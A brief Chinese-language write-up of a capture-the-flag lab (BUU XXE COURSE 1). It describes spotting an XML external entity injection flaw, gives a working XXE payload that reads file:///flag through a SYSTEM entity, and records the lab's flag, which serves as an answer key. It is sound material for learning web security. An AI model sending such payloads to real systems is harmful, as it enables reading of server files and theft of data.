XXE(xml外部实体注入漏洞)学习心得
靶机:BUU XXE COURSE 1 1
1.进入靶场
2.如何判断是XXE漏洞
在输入框输入参数,打开bp,出现以下,可能是存在XXE
或者F12,查看源码,由此可以确定是XXE漏洞
3.破解,找到flag
构造playload,
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE flag[
<!ENTITY a SYSTEM "file:///flag">
]>
<root>
<username>&a;</username>
<password>a</password>
</root>
4.得到flag
flag:flag{f16ed034-6cdf-420c-81a4-9179dc0ac293}